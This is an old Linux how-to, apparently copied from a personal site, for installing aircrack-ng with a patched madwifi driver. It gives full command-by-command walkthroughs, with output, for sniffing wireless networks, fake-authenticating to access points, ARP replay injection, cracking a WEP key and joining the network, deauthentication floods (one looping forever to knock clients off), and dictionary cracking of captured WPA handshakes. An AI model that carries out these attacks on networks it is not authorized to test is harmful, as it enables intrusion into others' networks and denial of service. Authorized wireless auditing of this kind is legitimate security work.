Update on 12 Aug 2006 on SUSE10.1
Aircrack is a set of tools for auditing wireless networks:
This installation will install madwifi driver with patch aircrack.
# get http://patches.aircrack-ng.org/madwifi-ng-r1679.patch# get http://snapshots.madwifi.org/madwifi-ng/madwifi-ng-r1679-20060707.tar.gz
# tar zxvf madwifi-ng-r1679-20060707.tar.gz# cd madwifi-ng-r1679-20060707/# patch -Np1 -i ../madwifi-ng-r1679.patch# make# make install# mod_probe ath_pci
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
# tar zxvf aircrack-ng-0.6.tar.gz# cd aircrack-ng-0.6/# make# make install# modprobe ath_pci
# iwlist ath0 scanath0 Scan completed : Cell 01 - Address: 00:03:2F:23:96:68 ESSID:"hoge1" Mode:Master Frequency:2.412 GHz (Channel 1) Quality=56/94 Signal level=-39 dBm Noise level=-95 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s Extra:bcn_int=100 IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK Extra:ath_ie=dd0900037f0101000eff7f Cell 02 - Address: 00:03:2F:23:92:64 ESSID:"hoge2" Mode:Master Frequency:2.437 GHz (Channel 6) Quality=12/94 Signal level=-83 dBm Noise level=-95 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s Extra:bcn_int=100 IE: WPA Version 1 Group Cipher : TKIP Pairwise Ciphers (1) : TKIP Authentication Suites (1) : PSK Extra:ath_ie=dd0900037f01010017ff7f
# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
# airodump-ng ath1 CH 13 ][ Elapsed: 28 s ][ 2006-08-12 15:32 BSSID PWR Beacons # Data CH MB ENC ESSID 00:03:2F:23:96:68 150 65 72 1 54. WPA hoge1 00:03:2F:23:92:64 101 4 0 6 54. WEP? hoge2 BSSID STATION PWR Packets Probes 00:03:2F:23:96:68 00:0F:A3:1C:C4:31 140 7 00:03:2F:23:96:68 00:0F:A3:1C:C4:3E 134 5 00:03:2F:23:96:68 00:0F:A3:1C:C4:48 132 10 hoge1 00:03:2F:23:96:68 00:0F:A3:11:02:C7 120 11 hoge1
This result shows some access points and clients associated with APs
# airmon-ngusage: /usr/local/sbin/airmon-ng [channel]Interface Chipset Drivereth0 PrismGT prism54# airmon-ng start eth0usage: /usr/local/sbin/airmon-ng [channel]Interface Chipset Drivereth0 PrismGT prism54 (monitor mode enabled)
# airodump-ng eth0 out 0 BSSID PWR Beacons # Data CH MB ENC ESSID 00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD 00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE BSSID STATION PWR Packets ESSID 00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE
# airodump-ng eth0 out 1 1 BSSID PWR Beacons # Data CH MB ENC ESSID 00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE BSSID STATION PWR Packets ESSID 00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE
# aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth012:14:06 Sending Authentication Request12:14:06 Authentication successful12:14:06 Sending Association Request12:14:07 Association successful :-)
If it cannot associate, use station’s MAC,
# aireplay-ng -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. In this case, setup the periodic re-association delay:
# aireplay-ng -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
# aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0Saving APR requests in replay_arp-1112-031550.capYou must also start airodump to capture replies.Read 39123 packets (got 1024 APR requests), sent 24543 packets...
# aircrack-ng -x -0 out.ivs
# iwconfig eth0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX# dhcocd eth0# ifconfig eth0eth0 Link encap:UNSPEC HWaddr 00-0A-79-18-35-7A-0A-00-00-00-00-00-00-00-00-00 inet addr:192.168.0.12 Bcast:192.168.0.255 Mask:255.255.255.0 inet6 addr: fe80::20a:79ff:fe18:357a/64 Scope:Link UP BROADCAST RUNNING MTU:1500 Metric:1 RX packets:330521 errors:0 dropped:0 overruns:0 frame:0 TX packets:157988 errors:3 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:24164635 (23.0 Mb) TX bytes:9864176 (9.4 Mb) Interrupt:11# ping google.comPING google.com (72.14.207.99) 56(84) bytes of data.64 bytes from 72.14.207.99: icmp_seq=1 ttl=234 time=203 ms64 bytes from 72.14.207.99: icmp_seq=2 ttl=234 time=201 ms
# airmon-ngusage: /usr/local/sbin/airmon-ng [channel]Interface Chipset Drivereth0 PrismGT prism54# airmon-ng start eth0usage: /usr/local/sbin/airmon-ng [channel]Interface Chipset Drivereth0 PrismGT prism54 (monitor mode enabled)
# airodump-ng eth0 out 0 BSSID PWR Beacons # Data CH MB ENC ESSID 00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD 00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE BSSID STATION PWR Packets ESSID 00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE
# airodump-ng eth0 out 1 BSSID PWR Beacons # Data CH MB ENC ESSID 00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE BSSID STATION PWR Packets ESSID 00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE
[ad#gad_3]
Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless clients.
# aireplay-ng -0 5 -a 00:A0:B0:40:5C:84 -c 00:04:23:52:80:41 eth000:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
# aireplay-ng -0 10 -a 00:A0:B0:40:5C:84 eth0# aireplay-ng -3 -b 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
After sending the five deauthentication packets, it starts listening for APR requests with attack 3. The -h option is necessary and must be the MAC address of an associated client.
# aireplay-ng -0 0 -a 00:A0:B0:40:5C:84 eth0
With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.
# zcat all.gz | egrep -v '^#' > dic
# aircrack-ng -w dic -0 out.capOpening out.capRead 154839 packets. # BSSID ESSID Encryption 1 00:A0:B0:40:5C:84 HOGE WPA (1 handshake) 2 00:02:2D:C2:38:AF UnknownIndex number of target network ? 1
Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several days.
Here is other my reports.
Tool | OS | CPU usage | Encryption | 802. | NIC Support | Packet injection | My recommendation |
---|---|---|---|---|---|---|---|
Airsnort (note) | Windows | High | WEP | 11b | Few | Not supported | Low |
Airsnort (note) | Linux | High | WEP | 11b | Few | Not supported | Low |
Aircrack (note) | Windows | Low | WEP, WPA | 11a/b/g | Many | Not supported | Mid |
Aircrack | Linux | Low | WEP, WPA | 11a/b/g | Many | Supported! | Recommended! |
from:http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html
联系客服